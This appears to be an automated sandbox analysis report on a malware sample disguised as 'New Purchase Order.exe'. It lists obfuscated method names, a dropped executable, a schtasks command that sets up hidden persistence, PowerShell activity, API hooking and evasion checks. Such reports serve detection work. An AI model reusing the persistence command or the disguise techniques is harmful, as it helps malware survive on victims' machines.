            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, ExRvkTwyDRY3WDaugW.cs High entropy of concatenated method names: 'xq75SoF65', 'MBpg5fnMH', 'WvJ4S61wx', 'X0uTeSNM3', 'S2Xpk1nbX', 'rRhYCdNE6', 'uybUUEAmlW01ueGk5w', 'Bm0PwbZLyFuyeF6JkJ', 'q1rNHPG1v', 'QO4OHUyKi'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, boMgoaHflWSYD8hTXl.cs High entropy of concatenated method names: 'Ula6a9WT6R', 'Y1G6XKv1Su', 'cQyNiraIQo', 'BwtNdvXovc', 'NhX68ytdb3', 'wLq6lwmQkM', 'bIH6kRRv0e', 'Vr56ZPWSFh', 'bLS69gP3cj', 'YJx6myARiJ'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, zIShGKFVU7XNWg2Mgi.cs High entropy of concatenated method names: 'xQGNhrBfPJ', 'scINAcq2ZT', 't4mN02s7GY', 'uLnNu8rW1C', 'uBVNZs3aVb', 'GxbN33i05B', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, wRGX8wQWID9wFOoes1.cs High entropy of concatenated method names: 'sukjZQQ0Mk', 'Yjuj9EgEqu', 'W6vjmknPmy', 'EIYjDv4ABC', 'YBgjCQ1Hp7', 'remjH0pyrX', 'DGljqcNLKW', 'uHNja0Wbx5', 'NUujFHkjjS', 'E6NjXNQ6W7'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, SaOS2Yx9nqj2m77EVd.cs High entropy of concatenated method names: 'wI0PekqJ4x', 'UuvPBeQgBr', 'O0RP5cFRd1', 'RolPgdlDVF', 'EbBPsHSyhp', 'zTmP4HAq7d', 'fKQPTFg3vZ', 'pLXPQuZR77', 'y9HPpb3b83', 'zj4PYFsCeg'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, pqSMjOU71QL7efIRAR.cs High entropy of concatenated method names: 'V932Gkqpgh', 'aBl2VLocvS', 'bfg2jfu3J7', 'USq2Lv6wXT', 'VtV2KWy5gF', 'RpS2RGK6qa', 'V7U2Peyj1H', 'tsd2UTeRp5', 'N4K2JossHA', 'Y5w2t1ZsbP'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, d6lgf2jMUmLwVZlh7E.cs High entropy of concatenated method names: 'Dispose', 'P2idFWPtm6', 'WcpwAab5t1', 'EK5ee3ahRY', 'PPFdX2en7H', 'RWydzRBJ0Q', 'ProcessDialogKey', 'Oc5wiIShGK', 'fU7wdXNWg2', 'wgiwwnpK78'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, Gn1myqd2XhOdEBacnrW.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'D5yOZFlQdy', 'i7TO9kXKgs', 'u7IOmLZQRu', 'rtpODclqgj', 'eswOCEN6XA', 'm8MOHWUc53', 'EL0OqK09IQ'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, VBLyFcdi5PPNAqTca6G.cs High entropy of concatenated method names: 'aK57eACnOx', 'aUa7BoZBeH', 'U8A75JmFVm', 'a8o7gIfr6V', 'mO27s4wbTZ', 'QXU74VFrO1', 'Fge7TSKk8y', 'YbZ7QMHTQC', 'rMI7psu1b1', 'cvC7YPpwOM'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, jF2en7aHZWyRBJ0Q8c.cs High entropy of concatenated method names: 'b73NVtL3tX', 'mo0NjyAv2K', 'AfKNLQ8mpR', 'vIcNKTJjGq', 'XYgNRrPkk8', 'tANNPPFy03', 'D5INUQax0d', 'pKlNJ7EBf2', 'a5mNti2N75', 'lrlNywabal'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, pZ8VsZpbIyXWRi4xmL.cs High entropy of concatenated method names: 'He9Lg9bYPa', 'm4ZL485f5n', 'IsYLQLoame', 'K74Lp7hIfs', 'cPhLfTBhhh', 'ONKLrMjGPE', 'rakL6TSBKq', 'wpeLNGduWv', 'mjmL7UhW3l', 'qPrLOdW5Cf'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, AmpewrzqopynfUd9IQ.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jVd7WiWO7U', 'tuY7fCut2Z', 'uIx7rJ2gS0', 'LBb76VrIRQ', 'ESI7NmM5Cv', 'KLF77My1SR', 'QHt7OLNVjP'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, yjihqph90VT05xOHal.cs High entropy of concatenated method names: 'erjRGcWlvm', 'cjdRjXBCPp', 'E5URK8qXfe', 'pMxRPtDeO5', 'g2wRUtkgJc', 'W9EKCKdXt7', 'wAvKHIP7sU', 'mw9KqdUjNN', 'mpQKaNCOrj', 'iThKF5pyTs'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, HZy5SBkh2W02yWXDLN.cs High entropy of concatenated method names: 'j8aWQyWCMB', 'dENWpXGZ9S', 'dcpWhnNMVf', 'w7UWAyZn1b', 'zI8WuRDZ98', 'Kj3W3I0XWr', 'NjnWSaX2a8', 'oVXWbHkqcH', 'Tg5W12lBsX', 'u0pW8mEYXY'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, FIWHVHS5suerTBVvIO.csHigh entropy of concatenated method names: 'FZnPVII5V8', 'ep0PLpYuvU', 'xV5PRZXDk4', 'J1YRXgvArg', 'cMGRzDXvor', 'JeTPiKZUVY', 'xe8PdpIJZS', 'tDMPwnpX4w', 'JVjP2bKIwP', 'kJJPn9Mr3S'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, epK78uX9OTwa4D0L5y.csHigh entropy of concatenated method names: 'cHK7d26un8', 'Rod72TeVOm', 'OUA7nS2MRf', 'JBk7VJpTtp', 'Md27jHVtu9', 'uDE7KlLWFh', 'tqk7RDevs2', 'PXaNqF1xKg', 'q2nNa0pB2u', 'ssJNFeNfcb'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, XY923XnGuNCejkYu1L.csHigh entropy of concatenated method names: 'jlIdPRGX8w', 'oIDdU9wFOo', 'QbIdtyXWRi', 'BxmdyLkcOh', 'EpOdfdgBji', 'Gqpdr90VT0', 'CjKpF6NacvkSPUdcJD', 'YlwsPfCw2QpANjbu6Y', 'VqFddKqI7a', 'GtMd2g88vF'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, ExRvkTwyDRY3WDaugW.csHigh entropy of concatenated method names: 'xq75SoF65', 'MBpg5fnMH', 'WvJ4S61wx', 'X0uTeSNM3', 'S2Xpk1nbX', 'rRhYCdNE6', 'uybUUEAmlW01ueGk5w', 'Bm0PwbZLyFuyeF6JkJ', 'q1rNHPG1v', 'QO4OHUyKi'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, boMgoaHflWSYD8hTXl.csHigh entropy of concatenated method names: 'Ula6a9WT6R', 'Y1G6XKv1Su', 'cQyNiraIQo', 'BwtNdvXovc', 'NhX68ytdb3', 'wLq6lwmQkM', 'bIH6kRRv0e', 'Vr56ZPWSFh', 'bLS69gP3cj', 'YJx6myARiJ'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, zIShGKFVU7XNWg2Mgi.csHigh entropy of concatenated method names: 'xQGNhrBfPJ', 'scINAcq2ZT', 't4mN02s7GY', 'uLnNu8rW1C', 'uBVNZs3aVb', 'GxbN33i05B', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, wRGX8wQWID9wFOoes1.csHigh entropy of concatenated method names: 'sukjZQQ0Mk', 'Yjuj9EgEqu', 'W6vjmknPmy', 'EIYjDv4ABC', 'YBgjCQ1Hp7', 'remjH0pyrX', 'DGljqcNLKW', 'uHNja0Wbx5', 'NUujFHkjjS', 'E6NjXNQ6W7'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, SaOS2Yx9nqj2m77EVd.csHigh entropy of concatenated method names: 'wI0PekqJ4x', 'UuvPBeQgBr', 'O0RP5cFRd1', 'RolPgdlDVF', 'EbBPsHSyhp', 'zTmP4HAq7d', 'fKQPTFg3vZ', 'pLXPQuZR77', 'y9HPpb3b83', 'zj4PYFsCeg'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, pqSMjOU71QL7efIRAR.csHigh entropy of concatenated method names: 'V932Gkqpgh', 'aBl2VLocvS', 'bfg2jfu3J7', 'USq2Lv6wXT', 'VtV2KWy5gF', 'RpS2RGK6qa', 'V7U2Peyj1H', 'tsd2UTeRp5', 'N4K2JossHA', 'Y5w2t1ZsbP'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, d6lgf2jMUmLwVZlh7E.csHigh entropy of concatenated method names: 'Dispose', 'P2idFWPtm6', 'WcpwAab5t1', 'EK5ee3ahRY', 'PPFdX2en7H', 'RWydzRBJ0Q', 'ProcessDialogKey', 'Oc5wiIShGK', 'fU7wdXNWg2', 'wgiwwnpK78'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, Gn1myqd2XhOdEBacnrW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'D5yOZFlQdy', 'i7TO9kXKgs', 'u7IOmLZQRu', 'rtpODclqgj', 'eswOCEN6XA', 'm8MOHWUc53', 'EL0OqK09IQ'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, VBLyFcdi5PPNAqTca6G.csHigh entropy of concatenated method names: 'aK57eACnOx', 'aUa7BoZBeH', 'U8A75JmFVm', 'a8o7gIfr6V', 'mO27s4wbTZ', 'QXU74VFrO1', 'Fge7TSKk8y', 'YbZ7QMHTQC', 'rMI7psu1b1', 'cvC7YPpwOM'
            Source: C:\Users\user\Desktop\New Purchase Order.exe File created: C:\Users\user\AppData\Roaming\ibDqDkseW.exe

            Boot Survival

            Source: C:\Users\user\Desktop\New Purchase Order.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp"

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\New Purchase Order.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\setupugc.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match; File source: Process Memory Space: New Purchase Order.exe PID: 6608, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: ibDqDkseW.exe PID: 7340, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\setupugc.exe; API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\setupugc.exe; API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\setupugc.exe; API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\setupugc.exe; API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\setupugc.exe; API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\setupugc.exe; API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\setupugc.exe; API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\setupugc.exe; API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Memory allocated: C80000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Memory allocated: 2B60000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Memory allocated: 1000000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Memory allocated: 78D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Memory allocated: 88D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Memory allocated: 8A80000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Memory allocated: 9A80000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe; Memory allocated: 30E0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe; Memory allocated: 3290000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe; Memory allocated: 5290000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe; Memory allocated: 7BC0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe; Memory allocated: 8BC0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe; Memory allocated: 8D60000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe; Memory allocated: 9D60000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_0117096E rdtsc; 8_2_0117096E
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 2889
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3786
            Source: C:\Windows\SysWOW64\setupugc.exe; Window / User API: threadDelayed 981
            Source: C:\Windows\SysWOW64\setupugc.exe; Window / User API: threadDelayed 8991
            Source: C:\Users\user\Desktop\New Purchase Order.exe; API coverage: 0.7 %
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe; API coverage: 0.2 %
